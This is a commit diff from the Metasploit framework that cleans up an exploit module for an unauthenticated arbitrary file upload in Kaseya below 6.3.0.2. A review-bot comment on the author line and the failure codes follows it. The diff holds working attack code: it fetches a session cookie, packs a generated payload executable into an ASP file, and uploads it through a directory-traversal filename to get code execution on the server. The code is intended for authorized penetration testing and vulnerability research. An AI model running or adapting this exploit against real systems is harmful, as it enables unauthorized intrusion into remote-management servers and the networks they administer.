Do minor clean up for kaseya_uploadimage_file_upload

bug/bundler_fix
jvazquez-r7 2013-12-03 09:34:25 -06:00
parent 21bb8fd25a
commit 2606a6ff0e
1 changed files with 29 additions and 26 deletions


@ -17,24 +17,25 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Kaseya uploadImage Arbitrary File Upload',
'Description' => %q{
This module exploits an arbitrary file upload vulnerability found in Kaseya versions below 6.3.0.2.
A malicious user can upload an ASP file to an arbitrary directory without authentication, leading to arbitrary code execution.
Code executed in this manner runs under an IUSR account.
This module exploits an arbitrary file upload vulnerability found in Kaseya versions below
6.3.0.2. A malicious user can upload an ASP file to an arbitrary directory without previous
authentication, leading to arbitrary code execution with IUSR privileges.
},
'Author' =>
[
'Thomas Hibbert <thomas.hibbert@security-assessment.com' # Vulnerability discovery and MSF module
'Thomas Hibbert <thomas.hibbert@security-assessment.com' # Vulnerability discovery and MSF module
],
'License' => MSF_LICENSE,
'References' => [
['URL', 'http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf'],
['OSVDB', '99984'],
['BID', '63782'],
['EDB', '29675']
],
'Payload' => {},
'References' =>
[
['OSVDB', '99984'],
['BID', '63782'],
['EDB', '29675'],
['URL', 'http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf']
],
'Platform' => 'win',
'Arch' => ARCH_X86,
'Privileged' => false,
'Targets' =>
[
[ 'Kaseya KServer / Windows', {} ],
@ -50,8 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
# the vuln was patched by removing uploadImage.asp. if the page is there, calling it without params will return 500, else 404
if not res or res.code != 500
unless res and res.code == 500
return Exploit::CheckCode::Unknown
end
@ -59,34 +59,37 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
@payload_name = "#{rand_text_alpha_lower(8)}.asp"
exe = generate_payload_exe
asp = Msf::Util::EXE.to_exe_asp(exe)
post_data = Rex::MIME::Message.new
post_data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"uploadFile\"; filename=\"#{@payload_name}")
data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
print_status("#{peer} - Getting cookie...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("SystemTab", "uploadImage.asp")
})
cookie = res.get_cookies
unless res and res.code == 500 and res.headers and res.headers.include?('Set-Cookie')
fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to get cookie")
end
cookie = res.get_cookies
@payload_name = "#{rand_text_alpha_lower(8)}.asp"
exe = generate_payload_exe
asp = Msf::Util::EXE.to_exe_asp(exe)
post_data = Rex::MIME::Message.new
post_data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"uploadFile\"; filename=\"#{@payload_name}")
data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
print_status("#{peer} - Uploading payload...")
res = send_request_cgi({
"method" => "POST",
"uri" => normalize_uri("SystemTab","uploadImage.asp"),
"uri" => normalize_uri("SystemTab", "uploadImage.asp"),
"vars_get" => {
"filename" => "..\\..\\..\\..\\#{@payload_name}"
},
},
"data" => data,
"ctype" => "multipart/form-data; boundary=#{post_data.bound}",
"cookie" => cookie
})
if not res or res.code != 200
unless res and res.code == 200
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
end
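Review bot: The `'Author'` entry in the first hunk still has an unterminated e-mail address: the re-indented line reads `'Thomas Hibbert <thomas.hibbert@security-assessment.com'` with no closing `>`, and a cleanup pass should make it `'Thomas Hibbert <thomas.hibbert@security-assessment.com>'`. In `exploit`, the new cookie guard reports three different outcomes (no response, a status other than 500, a 500 without `Set-Cookie`) as `Exploit::Failure::Unknown`. Going by the comment in `check`, a 404 means uploadImage.asp has been removed, so that case would read more accurately as `Exploit::Failure::NotVulnerable`, and a nil response as `Exploit::Failure::Unreachable`. Both `check` and `exploit` continue outside the visible hunks, so any later handling of these cases cannot be confirmed from here.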